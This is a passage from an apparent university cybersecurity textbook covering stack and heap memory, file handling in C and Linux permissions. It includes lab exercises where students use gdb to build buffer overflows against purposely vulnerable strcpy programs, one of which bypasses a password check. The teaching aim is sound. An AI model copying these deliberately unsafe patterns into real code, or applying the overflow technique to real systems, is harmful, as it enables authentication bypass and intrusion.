first_name to prevent this error? (d) There are at least two ways to change the above code to prevent the above error from happening. Describe one. 5. When the greetings function is called in main from the following code sample the stack pictured below is created. #include<stdio.h> void greetings() { int name_len = 15; char name[name_len]; int year = 2014; printf(“Enter your name: “); scanf(“%s”, name); printf(“Hello: %s! The current year is %d.\n”, name, year); } int main() { greetings(); } Stack year name name_len prev_ebp ret_addr (a) Assuming there is no padding (extra spaces) when the frame is created, how many characters must the user enter to overwrite only the first byte of the return address? (b) Is it possible to change the value of year by performing a buffer overflow attack? Why or why not? 178 Security Exercise 7 Part 1. Initial Setup Today you will use the program sx7.c which has been written for you and placed in the ec310code directory. Copy this file to the work directory by carefully entering the following at the home directory prompt: midshipman@EC310:~ $ cp ec310code/sx7.c Make sure you are at your home directory! Most people give up just when they're about to achieve success. They quit on the one-yard line. They give up at the last minute of the game, one foot from a winning touchdown. By the way…who am I? work Enter this! Verify that you have sx7.c in your work directory by changing to the work directory: cd work and then listing the files in the work directory: ls If you do not have sx7.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2. Part 2. The Program Use nano to examine the program sx7.c, which is also shown below: #include<stdio.h> #include<string.h> #include <stdlib.h> int main( int argc, char *argv[ ] ) { char schoolone[ 5 ] ; char schooltwo[ 5 ] ; if( argc <= 2 ) exit(1); strcpy( strcpy( schoolone , argv[ 1 ] ); schooltwo , argv[ 2 ] ); printf( "The best school is %s \n" , schoolone ); printf( "The second-best school is %s \n" , schooltwo ); } Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using gcc –g sx7.c Before running your program, answer the following questions: Question 1: If I were to enter (but do not yet enter): ./a.out Army Navy what would be the values of argc , argv[ 0 ], argv[ 1 ] and argv[ 2 ]? 179 Question 2: If I were to enter (but do not yet enter): ./a.out what would happen? Now, run the program by entering: ./a.out Make sure you understand the results. Now run the program a second time by entering: ./a.out Army Navy and again, make sure you understand what the program is doing. If you do not understand the operation of the program, STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 3. Part 3. Your first experience at hacking! Here is the background on this program: Your friend Cadet Lessheimer, who is attending USNA from the U.S. Military Academy on an inter-service exchange program for the socially impaired, has written the program on the preceding page. um… go army…??… Cadet Lessheimer, USMA, Class of 2016 He says: “Let’s run my program! I’ll enter the name of my school and then you, my dear midshipman friend, will enter the name of your school, and then we’ll see which school the program says is Number 1.” Since Cadet Lessheimer goes first, and always puts in Army, the string Army will be placed in argv[1]. Since the program copies argv[1] into schoolone, and then announces that schoolone is the best school, the program is designed so that it will always say: The best school is Army The second-best school is (whatever the midshipman entered) As you can see, he is named Cadet Lessheimer for a reason. YOUR MISSION: HACK THE CADET’S PROGRAM! Your hack should work as follows: Cadet Lessheimer runs the program and enters Army and then let’s you enter your school. After you make your entry, the program prints out: The best school is Navy thus shocking the Cadet into a mind-numbing stupor. 180 Moreover, the output also provides an indication that the second best school is also Navy! Here is an example of how the program's output might appear: Note that you cannot make any changes to the C program! So… how will you accomplish this? By designing a buffer overflow! (really… you will!) Enter the following commands: gcc –g sx7.c gdb –q ./a.out set dis intel list <Enter> (Note that the reason for the second <Enter> above is to display the full program. Entering list will only display the first ten lines of the program.) Here is what you would like to accomplish: You want to examine the stack while the program is running, and determine if you can overwrite the cadet's entry by using a buffer overflow. Looking at the program listing, we see: STEP 1: Determine the proper breakpoint for your program. You want the program to run up to a certain point, then freeze at a breakpoint, allowing you to examine the stack. Where should you set the breakpoint? Looking at the figure above, setting the breakpoint at line 2 would clearly be worthless, since nothing significant has occurred by that line of the program. You want to set the breakpoint to be at a point after the command line arguments (i.e., the cadet's entry which is Army, and your entry) are on the stack. Question 3: Where should you set the breakpoint? STOP and show your instructor or lab tech your answer to Question 3. With their okay, proceed to Step 2 below. 181 STEP 2: Run to the breakpoint and examine the stack. To enter a breakpoint for a program that requires command line arguments (where, let’s say, the command line arguments are Army and Navy, you would enter: break <whatever number you have for Question 3> run Army Navy For example, if you answered Question 3 by deciding the breakpoint should be at line 4, you would enter: break 4 run Army Navy Now, examine the stack by entering i r esp i r ebp Question 4: How many bytes are on the stack? Examine the stack by entering: x/60xb $esp Question 5: Label, in the Description column, the locations of the addresses to which main's stack and base pointer point. Label the base pointer as EBP-main and the stack pointer as ESP-main. Question 6: Locate on the stack the location of where the two command line arguments are stored. Recall that the program copies argv[1] into schoolone and argv[2] into schooltwo. Show these on the table below, labeling them as schoolone – cadet's entry and as schooltwo – midshipman's entry . STEP 3: Determine the attack technique. Question 7: Based on your picture of the stack, which is true (a or b): (a) If schoolone is long enough, it can overwrite schooltwo (b) If schooltwo is long enough, it can overwrite schoolone Question 8: Based on your picture of the stack, design your buffer overflow. Write a clear explanation of how your attack works in the answer space for Question 8. Question 9: Demonstrate your buffer overflow attack during a run of the program. Your instructor or lab tech will sign off on this. 182 183 184 Security Exercise 7 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5 and Question 6: Address Value BFFFF7CD BFFFF7CE BFFFF7CF BFFFF7D0 BFFFF7D1 BFFFF7D2 BFFFF7D3 BFFFF7D4 BFFFF7D5 BFFFF7D6 BFFFF7D7 BFFFF7D8 BFFFF7D9 BFFFF7DA BFFFF7DB BFFFF7DC BFFFF7DD BFFFF7DE BFFFF7DF BFFFF7E0 BFFFF7E1 BFFFF7E2 BFFFF7E3 BFFFF7E4 BFFFF7E5 BFFFF7E6 BFFFF7E7 BFFFF7E8 BFFFF7E9 BFFFF7EA BFFFF7EB BFFFF7EC BFFFF7ED BFFFF7EE BFFFF7EF BFFFF7F0 BFFFF7F1 BFFFF7F2 185 Description Address Value Description BFFFF7F3 BFFFF7F4 BFFFF7F5 BFFFF7F6 BFFFF7F7 BFFFF7F8 BFFFF7F9 BFFFF7FA BFFFF7FB BFFFF7FC BFFFF7FD BFFFF7FE BFFFF7FF BFFFF800 BFFFF801 BFFFF802 BFFFF803 BFFFF804 BFFFF805 BFFFF806 BFFFF807 BFFFF808 BFFFF809 BFFFF80A BFFFF80B BFFFF80C BFFFF80D BFFFF80E BFFFF80F BFFFF810 BFFFF811 BFFFF812 BFFFF813 BFFFF814 BFFFF815 BFFFF816 BFFFF817 BFFFF818 BFFFF819 BFFFF81A Question 7: Question 8: Question 9: When you have successfully hacked the cadet's program, show your instructor or Lab tech. Your instructor/tech will sign your answer sheet. _________________________________ Instructor or Lab Tech signature 186 Chapter 8: The Heap Objectives: (a) Explain the purpose of the heap and describe how memory on the heap is allocated. 1. The Heap 1.1 Introduction. We mentioned a few chapters back the fact that when a program is to be executed, the OS reserves a block of main memory for the program’s use. This block of memory is then partitioned into segments. The “text” segment holds the actual program (the machine language instructions which we can view as assembly-language instructions.) The “stack” segment is the memory that the program has available to store information during execution. For example, the program’s variables are stored on the stack. The above picture is full and complete for the programs that we have dealt with up to this point. But the above picture is lacking as a full description for more general programs. Once a C program is compiled and the corresponding machine code generated, the amount of space for the text segment is fixed. Similarly, the compiler knows about all variables that we declare in our program, so the compiler can make room for these variables on the stack as soon as the function that uses these variables is invoked. The precise placement of data on the stack is completely controlled by the compiler. Oftentimes when we run a program, we will want to use memory that cannot be anticipated in advance by the compiler (if the compiler had anticipated it, it would have reserved space for it on the stack). For example, suppose we want our program to use an array of characters, but the size of the array is a value that the user will enter at the keyboard while the program is running. The compiler cannot, in advance, predict the size of the array, since the size will depend on whatever value the user happens to enter. So, we need an additional segment of memory available for the programmer to directly control. This additional segment is called the heap. The heap, like the stack, varies in size—it will grow and shrink based on the memory needs of the user as the program is running. The heap and the stack, in fact, grow towards each other. 187 Note that the total space allocated for the heap and the stack is fixed so, in a sense, the heap and the stack compete with each other for space. As items are added to the heap, the size of the heap grows and the "bottom of the heap" moves to a higher memory address. As items are added to the stack, the size of the stack grows and the "top of the stack" moves to a lower memory address. Practice Problem 8.1 Consider the picture above, showing program 1 in memory. (a) How does the CPU keep track of the program's proper location within the text segment? (b) How does the CPU keep track of where the stack is located in main memory? Solution: (a) (b) 1.2 Heap Allocation. The preceding question might leave you wondering: How does the CPU keep track of where the heap is located in main memory? The answer to this question is: It doesn't. It is up to the programmer to keep track of the heap. The point bears repeating: The compiler takes care of the stack, YOU (the programmer) must take care of the heap. To allocate memory on the heap, we use the malloc function. We tell the malloc function the number and type of the space we need (e.g., “space for 6 integers” or “space for 25 characters”) and malloc returns a pointer to the start of the memory that is allocated on the heap for this purpose. For example, to allocate space for 6 integers (which requires 24 bytes), we would use: int *ptr1 ; ptr1 = (int *) malloc(24) ; After these two lines of code execute, ptr1 will hold the address to space on the heap for six integers. Note that the argument to the malloc function is the number of bytes we would like to allocate on the heap. Practice Problem 8.2 Write a snippet of C code that will allocate space on the heap for 25 characters. Solution: 188 Practice Problem 8.3 Which segment of memory is physically highest (i.e., has the smallest addresses)? (a) Heap (b) Stack (c) Text Segment (d) Registers Solution: Practice Problem 8.4 In which direction does the heap grow? (a) From the bottom (larger memory address) up (to a smaller memory address). (b) From the top (smaller memory address) down (to a larger memory address). (c) It depends on the corresponding number and types of variables currently allocated on the stack. (d) It depends on the prolonged effects of solar and liquescent additives combined with the chemical makeup of the heap. Solution: This whole notion of using the heap may seem mysterious, so let's look in gory detail at an example. Our goal is to write a program that accepts, as command line arguments, a number of bytes to allocate on the heap (to hold character data), and a text string to place in that newly allocated memory. For example, if we executed our program (./a.out) with command line arguments as shown: midshipman@EC310-VM:~ $ ./a.out 10 cyber2 the program would allocate 10 bytes on the heap, store the characters "cyber2" at this location, and output a message telling us the starting address for our 10 byte allocation (the address that will contain the c in "cyber2"). Here is the program to accomplish this. We will examine the program line-by-line. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 #include<stdio.h> #include<string.h> What in blazes is atoi on line 10? int main( int argc , char *argv[ ] ) { char *ptr ; int size; size = atoi( argv[ 1 ] ) ; Do not fear! All will be explained below! ptr = ( char* ) malloc( size ); strcpy( ptr , argv[ 2 ] ); printf("\nThe following is stored on the heap at address %x:", ptr); printf( "%s \n\n" , ptr ); free( ptr ) ; } 189 Practice Problem 8.5 When we run the program above by entering: ./a.out (a) (b) (c) 10 cyber2 What is the value of argc? What are the values of argv[ 1 ] and argv[ 2 ] ? What are the types of argv[ 1 ] and argv[ 2 ] ? Solution: (a) (b) (c) On line 6 we declare a pointer to a character named ptr. Our intent (as we will soon see) is that ptr will point to the first character in a string of characters. On line 8 we declare an integer named size, and then on line 10 we set size to be equal to the integer value of argv[1]. Recall that the intent of the second command line argument, argv[ 1 ], is to specify the number of bytes that we wish to reserve on the heap. We want to reserve 10 bytes on the heap, so we typed in 10 as the second command line argument. It is important to remember, though, that all command line arguments are stored as strings. So we have to convert argv[1] to an integer. You can convert a string to an integer using the function atoi (which stands for ASCII to integer). Line 12 then reserves 10 bytes on the heap, and stores the starting address of the first byte in ptr. At this point, the programs memory is as follows: Line 14 then copies the string argv[2] into the memory starting at ptr. After line 14, the program's memory looks as follows: 190 On lines 16 and 18 we print out the address of argv[2] on the heap. Here is the output: So we can refine the picture of this program in memory: There is one last (important!) point about the heap. If our program no longer needs memory that was allocated on the heap, it should free it up so that it can be reused. This is done with the free function. For example, to free the heap memory in the prior program, we would use the line of code: free( ptr ) ; So, our final program includes line 20. Practice Problem 8.6 Suppose we run the program shown above with the debugger, and set a breakpoint at line 16. Which of the following is a possible value stored in the instruction pointer eip? (a) 0x0804848c (b) 0xbffff810 (c) 0x0804a010 Solution: Practice Problem 8.7 Suppose we run the program shown above with the debugger, and set a breakpoint at line 16. Which of the following is a possible address for where the variable size is stored? (a) 0x0804848c (b) 0xbffff810 (c) 0x0804a010 Solution: Practice Problem 8.8 The above picture of the stack shows that the variable size is stored "above" (i.e., at lower memory) than ptr. How do we know that this must be the case? Solution: 191 For this chapter's security exercise, we have to add a little bit to your C repertoire. For now, we have to cover the string compare command and the syntax for passing an array as an argument to a function. It’ll be fun. 2. More Fun with C 2.1. A new string command Recall earlier that we were able to enter or change the value of strings using the strcpy command. Specifically, the command strcpy( s1 , s2 ); copies the string s2 to the string s1. Another useful command is the string compare command, strcmp. The command value = strcmp( s1 , s2 ); Compares the strings s1 and s2 character by character. The function returns an integer greater than zero if s1 > s2 and returns an integer less than zero if s1 < s2. Perhaps most importantly, the function returns zero if the two strings are equal (i.e., identical). To use these functions, you must have the preprocessor directive: #include <string.h> Practice Problem 8.9 What is the output of the following program? #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int { char char char char argc, char *argv[]) string1[ string2[ string3[ string4[ ] ] ] ] = = = = "Happy" ; "Joyous" ; "Happy Times" ; "Happy" ; if(strcmp( string1 , string2 ) == 0) printf("\n String 1 and String 2 match\n"); else printf("\nString 1 and String 2 do NOT match\n"); if(strcmp( string1 , string3 ) == 0) printf("\nString 1 and String 3 match\n"); else printf("\nString 1 and String 3 do NOT match\n"); if(strcmp( string1 , string4 ) == 0) printf("\nString 1 and String 4 match\n\n"); else printf("\nString 1 and String 4 do NOT match\n"); } Solution: 192 2. Passing an array to a function To pass an array to a function we use the array name as an argument. In the function header, though, the type must be a pointer, since an array name is an address. For example, suppose we had a string (an array of characters) declared as char name[ 10 ]; and we wanted to pass this array (as the only argument) to a void function named fun. Then the function call would be fun( name ); and the first line of the function definition would be void fun( char *input ) Thus, the argument (name) is passed to a parameter (input) which is a pointer to an array of characters. 193 194 Problems 1. Suppose I have a C source-code file midshipman.c that creates a pointer to a character buffer as follows to store each student’s alpha code: char *alpha_ptr; 2. (a) What must I type to allocate 20 bytes on the heap for this string? (b) After the midshipman graduates and this string is no longer needed, what instruction would a responsible programmer include at the end of the program? (c) Why is it a good idea to include the instruction that you noted in question (b) above? Your friend is writing a program that takes two command line arguments (aside from ./a.out). The idea behind the program is that the user is to provide the number of bytes to allocate on the heap, and a string to place on the heap. For example, if the user enters ./a.out 100 cyber2 then the program should allocate 100 bytes on the heap and place the string cyber2 on the heap. However, when your friend runs the program, it seems to execute for 30 seconds or so, and then presents a very unpleasant message: Your friend knows that you are a genius taking the Cyber-2 course, so she has asked you for help. Her program is shown below. Enter the following program and run it. What is causing your friend's program to crash? #include<stdio.h> #include<string.h> int main( int argc , char *argv[ ] ) { char *ptr ; int size; int i; size = atoi( argv[ 1 ] ) ; for(i=0; i=size; i=i+1) { ptr = ( char* ) malloc( size ); strcpy( ptr , argv[ 2 ] ); } } 3. Explain, in your own words, how a buffer overflow occurs in memory. 4. Given the following variable declarations and stack diagram (no padding) for a game: char user[16]; int highscore; char nickname[x]; Address Value 0xbffff800-> 0xbffff80c-> 0xbffff810-> 0xbffff820-> 0xbffff824-> 1000 lynn 0xbffff840 0x080483e0 Variable <-nickname <-highscore <-user <-Saved ebp <-Return Address This program allows you to enter your nickname when you run it from the command line. ./game nickname (a) What is the value of ‘x’? (# of bytes allocated for nickname) 195 5. (b) How many bytes must you put into nickname to completely overwrite highscore? (c) How could you change the above variable declarations to ensure highscore could not be overwritten? (d) What is the minimum number of bytes that you can put into nickname to crash the program? (e) What string can you put into nickname to overwrite highscore with value 16963? Is it possible for the heap and stack to collide? Choose the answer below which most correctly answers this question: (a) Yes, because the stack builds from the bottom (larger memory address) up (to a smaller memory address) and the heap from the top (smaller memory address) down (to a larger memory address). (b) Yes, because the heap builds from the bottom (larger memory address) up (to a smaller memory address) and the stack from the top (smaller memory address) down (to a larger memory address). (c) No, because the stack builds from the bottom (larger memory address) up (to a smaller memory address) and the heap from the top (smaller memory address) down (to a larger memory address). (d) No, because the heap builds from the bottom (larger memory address) up (to a smaller memory address) and the stack from the top (smaller memory address) down (to a larger memory address). 196 Security Exercise 8 There are people who make things happen, there are people who watch things happen, and there are people who wonder what happened. To be successful, you need to be a person who makes things happen. Looks like we have a problem. Who am I? Part 1. Background and Initial Setup USMA Exchange Cadet Lessheimer and his friend, Exchange Cadet Geekenstein, have written a program to control access to the USMA Knowledge Database (which is a very small text file). The idea is this: To be granted access to the USMA Knowledge Database, when you run the program you also enter a password on the command line. If you enter a valid password, you are granted access. If you enter an invalid password you are denied access. You start by surreptitiously looking in the trash can outside the cadet’s room. Amidst the candy-bar wrappers, Doritos bags and empty Kool-Aid containers, you find a piece of paper labeled SECRET SOURCE CODE. Looking at the paper, you see the program below: #include <stdio.h> #include <stdlib.h> #include <string.h> int check_password( char *password ) { int auth_flag = 0; char password_buffer[16]; strcpy( password_buffer, password ); if(strcmp( password_buffer, "donkey" ) == 0) auth_flag = 1; if(strcmp( password_buffer, "gousma" ) == 0) auth_flag = 1; return auth_flag; } 197 int main(int argc, char *argv[]) { if(argc < 2) exit(0); if ( check_password( argv[1] ) == 0 ) printf("\n\n Access Denied.\n\n"); else printf("\n\n Access Granted.\n\n"); } You have typed this program into the file named accesscontrol.c . To save you the trouble of typing, we have already placed this file on your machine in the EC310 folder under your home directory. Copy this file to the work directory by carefully entering the following at the home directory prompt: midshipman@EC310:~ $ cp ec310code/accesscontrol.c Make sure you are at your home directory! work Enter this! Verify that you have accesscontrol.c in your work directory by changing to the work directory: cd work and then listing the files in the work directory: ls If you do not have accesscontrol.c Otherwise, proceed to Part 2. in your work directory STOP and ask your instructor or lab tech for help. Part 2. Gaining Access by Buffer Overflow Before compiling and executing the program, let's first see if we can understand its operation. Suppose I were to run the program (./a.out) by entering at the command line: midshipman@EC310-VM:~ $ ./a.out Navy Question 1. If I ran the program as above, what would be the value of argc? Question 2. If I ran the program as above, what would be the value of argv[0]? Question 3. If I ran the program as above, what would be the value of argv[1]? Question 4. Where does this program begin executing? Question 5. What is the purpose of the two lines: if(argc < 2) exit(0); Question 6. In main, what is the value of the argument that we give to the function named check_password? (Recall our input as depicted in the command line shown above.) Question 7. What happens in main if the function named check_password returns a value of 0? 198 Question 8. What happens in main if the function named check_password returns a value other than 0? Question 9. Finish this sentence: The function check_password returns the value of the variable named auth_flag. For access to be denied in main, the value of auth_flag that is returned must be equal to ____. Question 10. Let's look at the function check_password . After the line of code: strcpy( password_buffer, password ); executes, what will be stored in password_buffer? Recall that the function string compare , strcmp, in the generic line of code value = strcmp( s1 , s2 ); Compares the strings s1 and s2 character by character. The function returns zero if the two strings are equal (i.e., identical). Question 11. Recalling our presumption that you entered at the command line: midshipman@EC310-VM:~ $ ./a.out Navy will either of the two strcmp operations in the function check_password return a value of zero? Question 12. Will the function check_password return to main a value equal to zero, or will it return something other than zero? Question 13. If you enter at the command line: midshipman@EC310-VM:~ $ ./a.out Navy what message will be sent to the screen? At this point, if you are confused by the operation of the program (on paper), ask your instructor for help. Let's now compile the program: gcc –g accesscontrol.c and run the program. Try out executing the program with a few different command line inputs. You should see that the two secret passwords that will allow access are donkey and gousma . So, you can enter one of these passwords and gain access! But that is not your goal. The cadets might, in the future, change their passwords, in which case you will have to try to find a new version of the source code. Your goal is to find a way to hack the cadet's program so that even if they change the passwords you will be able to gain access. Determine a password that you can enter that will always allow access, regardless of the actual passwords being used by the cadets! Enter the following commands: gcc –g accesscontrol.c gdb –q ./a.out set dis intel list check_password <Enter> list main <Enter> 199 Here is what you would like to accomplish: You notice that in the function check_password, the variable auth_flag is initially set to zero. The only way auth_flag is ever changed is if we enter the correct password. But… perhaps we can change the value of auth_flag by executing a buffer overflow without needing to worry about the correct password!!! Perhaps the incorrect password you enter as the command line argument can be used to change the value of auth_flag !!! STEP 1: Determine the proper breakpoint for your program. You want the program to run up to a certain point, then freeze at a breakpoint, allowing you to examine the stack. Where should you set the breakpoint? Looking at the listing on your screen, you want to set the breakpoint to be at a point where you can examine how the command line argument (i.e., what you enter as the pretend password) is situated with respect to the variable auth_flag. Question 14: Where should you set the breakpoint? STOP and show your instructor or lab tech your answer to Question 14. With their okay, proceed to Step 2 below. STEP 2: Run to the breakpoint and examine the stack. To enter a breakpoint for a program that requires command line arguments (where, let’s say, the command line argument is Navy, you would enter: break <whatever number you have for Question 14> run Navy For example, if you answered Question 14 by deciding the breakpoint should be at line 4, you would enter: break 4 run Navy Now, examine the stack by entering i r esp i r ebp Question 15: How many bytes are on the stack? Question 16: Whose stack frame is this anyway? Is this the stack frame for main? Examine the stack by entering x/60xb $esp Question 17: Fill in the values in the table below, showing where the base pointer (label as EBPcheck_password) and stack pointer (label as ESP-check_password) are pointing to. Label these addresses on your picture. Question 18: Locate on the stack the two command line arguments. Show these on the table below, labeling them as password_buffer and authflag. STEP 3: Determine the attack technique. Question 19: Based on your picture of the stack, design your buffer overflow. Write a clear explanation of how your attack works in the answer space for Question 19. Question 20: Demonstrate your buffer overflow attack during a run of the program. Your instructor or lab tech will sign off on this. The program used in this lab was adapted from a program presented in Hacking, the Art of Exploitation, by Jon Erickson, No Starch Press, 2008. 200 Security Exercise 8 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5: Question 6: Question 7: Question 8: Question 9: Question 10: Question 11: Question 12: Question 13: 201 Question 14: Question 15: Question 16: Question 17 and Question 18: (Note: Each line in the table below represents four bytes.) Address Contents Question 19: Question 20: When you have successfully hacked the cadet's program, show your instructor. Your instructor will sign your answer sheet. _________________________________ Instructor or Lab Tech signature 202 Chapter 9: Privilege Management Objectives: (a) Describe how permissions are managed and controlled in a multi-user OS environment. (b) Explain how users can be afforded the limited ability to execute commands with escalated privileges. NEW EMAIL PROCEDURES GIVING YOU AN EMAIL ACCOUNT 1. Files in C 1.1. Introduction We can use the C language to open files, read from files, write to files and close files. In C, a file name is tied to an integer called the file descriptor. Once we tie a file name to a file descriptor, we work only with the file descriptor. 1.2. Opening a File Let’s look at a C program, that I’ve named fun_with_files.c that opens a file named stuff: #include<stdio.h> #include<stdlib.h> #include<string.h> #include<fcntl.h> #include<sys/stat.h> These two lines tell the compiler that your program intends to use files. If you will be using files, just (blindly!) include these two lines. int main( int argc , char *argv[ ] ) { int fd ; This line should be the only line that looks insane to you! Do not fear! This line will be explained below. fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); printf("The assigned value of the file descriptor is %d\n",fd); if ( fd == -1 ) { printf( "\nFailed to open.\n"); } } Notice first that we have a few new #include directives at the top of the program. These are necessary for C to work with files. Don’t worry about these lines of code (other than ensuring that they are at the top of the program). The only craziness in the program is the line: fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); At its heart, this line of code ties the file named stuff to an integer value which is placed in the variable fd. This line of code essentially asks the C compiler: “I, the programmer, want to use the file named stuff. I might want to read what is in it. I might want to write to it. I know that you, the C compiler, do not want to see the file name (in this case, stuff) running around the program, 203 so give me an integer to use as a stand-in for the file named stuff, and place that integer in the variable that I’ve named fd. Then, later, if I want to do something with the file named stuff, I’ll just refer to the integer fd” So, let's run the program and see what happens! First, I will look at my home directory: Now, I will compile and run the program: We see that C assigned the file named stuff to the file descriptor value of 3 (i.e., fd = 3). If, when dealing with files, C simply cannot figure out what to do, it will assign the integer -1 to the file descriptor. That is why we placed that final if statement at the end—in order to check if the compiler encountered some difficulty. At this point, you might be thinking: "Okay, so what? What did the program do?" Well, if I now list the files in my home directory once again, I see: Notice that the file stuff now exists! 1.3. Looking at a File So far, we have looked at files using the nano editor. Oftentimes we want to look at the contents of a file, with no intention whatsoever to edit the file. In cases where we merely want to view the contents of a file, there is no need to open an editor. Linux provides us with the cat command. The command cat filename will display the contents of the file named filename. For example, if I enter: cat fun_with_files.c I see: The contents of the file named fun_with_files.c 204 Let's observe the contents of the file named stuff using cat: and I see … nothing. At this point, you might be thinking: "Okay, so what? What did the program do?" 1.4. Writing to a File Let's answer the question: What did the program do?" The program did create the file named stuff, but that is all it did. Specifically, it did not write any contents to the file. The file has been created, but is empty. So, when we used the cat command to display the contents of the file named stuff, we did indeed see the contents: nothing. So, let’s modify our program so that we can add content to our file. Before presenting the program, we need to introduce two additional string functions: strnlen( buffer ) returns the length of the string named buffer strncat( buffer , "\n" , 1 ) adds a new-line character to the end of the string buffer. Practice Problem 9.1 What is the output of the program shown below? #include<stdio.h> #include<string.h> int main( int argc , char *argv[ ] ) { char my_string[15] = "USNA Rules!" ; printf( "The string is %s" , my_string ) ; printf("The string's length is: %d\n" , strnlen( my_string ) ); strncat( my_string , "\n" , 1 ) ; strncat( my_string , "\n" , 1 ) ; printf( "The string is %s" , my_string ) ; printf("The string's length is: %d\n" , strnlen( my_string ) ); } Solution: Notice that the strnlen function does not count the terminating NULL as one of the characters in the string. The terminating NULL (the byte of all zeroes) is certainly there (that is, after all, how the first and third printf statements above knew when to stop), but the presumption is made that when the programmer wants to know the length of the string, the only concern is with the number of characters preceding the NULL. Now, armed with these two new string commands, let’s modify our program fun_with_files.c so that when we execute the program, we will include a text string as a command line argument. The program will append the text string to the end of the file stuff using the write command. The next page displays our modified program, still named fun_with_files.c . Let's suppose I run this program with the command line argument "To be a midshipman", as shown below: 205 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 23. 24. 25. 26. 27. 28. #include<stdio.h> #include<stdlib.h> #include<string.h> #include<fcntl.h> #include<sys/stat.h> int main( int argc , char *argv[ ] ) { int fd ; char *buffer ; buffer = (char *)malloc(100); strcpy( buffer , argv[ 1 ] ); strncat( buffer , "\n" , 1 ); fd = open("stuff", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); if ( fd == -1 ) { printf( "\nFailed to open.\n"); exit(0); } write( fd , buffer , strnlen( buffer ) ); free( buffer ); } Line 9 declares the integer variable that will hold the file descriptor. Recall that the file descriptor is just a stand-in for the name of the file we will be reading from and writing to. Line 10 declares a string named buffer that, in line 12, is allocated 100 bytes of space on the heap. Line 14 copies argv[1] into buffer , and line 16 adds a newline character to the end of the string named buffer. 206 At line 17, the picture of our program in main memory looks like this: Now, line 18 ties the file named stuff to a file descriptor. Lines 20-24 are added to the program so that the user is informed if the compiler had some trouble opening the file. The key line of the program that actually adds something to our file named stuff is line 25: write( fd , buffer , strnlen( buffer ) ); This writes the data pointed to by buffer (which in this case is the string To be a midshipman followed by a new line) into the file whose file descriptor is fd (which is the file named stuff). The third argument to the function tells how many bytes to write. Let’s run the program, showing the contents of the file named stuff. Let's run this program two more times, examining the file named stuff along the way: 207 If I decide to look at the file named stuff using nano, I see: Practice Problem 9.2 What would happen if we did not have quotation marks in our command line arguments above? Solution: You should appreciate the fact that the file stuff is permanent. If you close VMware and turn off your computer, the file stuff will be there when you turn your computer back on. 1.5. File Closing. After you have finished writing to a file, the file should be closed. The syntax to close a file is close( fd ); Again, note that closing a file doesn't delete it! The file is still there, and, if opened by a program later will be in precisely the same condition it was in before it was closed. So, to make the preceding program perfect, we should close the file by adding this line to the end of the program. 2. Linux Access Privileges 2.1 File Access for Reading, Writing and Executing. Every file has access privileges that control who can read, write and execute the file. Every directory has similar privileges, but, for directories, read means “read the contents of the directory,” write means “add or remove files from the directory” and execute means copy files from the directory. You can see the access privileges for a file or directory by entering the ls –l command. The –l stands for long; that is, we want the long listing! A line produced by this command (one line will be produced for each file and directory) might look like this: -rwxr-x--x 1 jones happymids 1024 July 16 17:12 208 happy_times.exe Here is what the various fields in this line mean: - rwxr-x--x 1 jones happymids The file owner 1024 July 16 17:12 happy_times.exe The file size The file name The file creation date The file owner also belongs to this group This is our main focus for today… these are the access privileges. More on this below! The dash indicates a file. If this line item was a directory, the first symbol would have been a d. The important points above: (1) The file is named happy_times.exe and (2) the owner of the file is jones and (3) the access privileges are rwxr-x--x. Let’s look more closely at the nine symbols that comprise the access privileges. The symbols used are: r w x - for read (which also allows the copying of the file) for write for execute for no access The first three symbols (i.e., the first triplet) refer to the file owner, the second triplet refers to the owner's group and the third triplet refers to the general public (everyone who has an account on your system). So, given the access privileges that we see in the example above: The owner (jones) can read, write to and execute the file happy_times.exe. The group (happymids) can read and execute the file happy_times.exe but cannot write to it. The general public can do nothing other than execute the file happy_times.exe. The access privileges are called the mode of the file or directory. The owner of a file can change the access privileges for a file using the change mode (chmod) command. The command’s format is: 209 Practice Problem 9.3 What are the access privileges for happytimes.exe after the command shown above is entered? Solution: Practice Problem 9.4 What command would remove the ability for the public to execute happytimes.exe? Solution: Practice Problem 9.5 What single command using the assign operator would assign the public the ability to read and execute happytimes.exe? Solution: It should be reiterated that only the owner can change a file's mode. Wait… that's not right… who else can change a file's mode? Practice Problem 9.6 Who, besides the file's owner, can change a file's mode. Solution. Practice Problem 9.7 And just how does one get to be the owner of a file anyway? Solution: 3. Giving Up a Little Control with sudo and setuid 3.1. User Accounts Let's take our earlier program, fun_with_files.c and—since we are eight pages into this chapter and no longer having much fun—rename it as: note1.c. Recall that this program takes a text string as a command line argument, and appends the text string to the end of a file. Let's give the file we read from and write to the more practical name of notes. This file named notes will reside in the /tmp directory. #include<stdio.h> #include<stdlib.h> #include<string.h> #include<fcntl.h> #include<sys/stat.h> int main( int argc , char *argv[ ] ) { int fd ; char *buffer ; buffer = (char *)malloc(100); strcpy( buffer , argv[ 1 ] ); strncat( buffer , "\n" , 1 ); fd = open("/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); if ( fd == -1 ) { printf( "\nFailed to open.\n"); } write( fd , buffer , strnlen( buffer ) ); free( buffer ); close( fd ); } 210 When we compile a program, the executable object code file is named a.out. We can change the name of the object code to a name of our choosing by using the –o specifier. In the screen capture below, I named the executable code as note1.exe. Let’s look at the read, write and execute permissions for the source code (note1.c), the object code (note1.exe) and the text file that this program creates and writes to (/tmp/notes): It would seem that the executable program that we wrote (note1.exe) can be executed by anyone, but the file /tmp/notes can only be read and written to by the user named midshipman (since the file is owned by user midshipman). How many users have accounts on our system? How can we find out? Recall that in Linux, every user is given a directory under the home directory. So, let's see who has folders under the home directory. There is one user that is not shown on this list: the user named root. Of all accounts on a Linux system, the account named root has special privileges and full access rights over the entire system. The root account is owned by the system administrator, and has the ability to read, write and execute all files in anyone’s account. Each user who has an account on a Linux 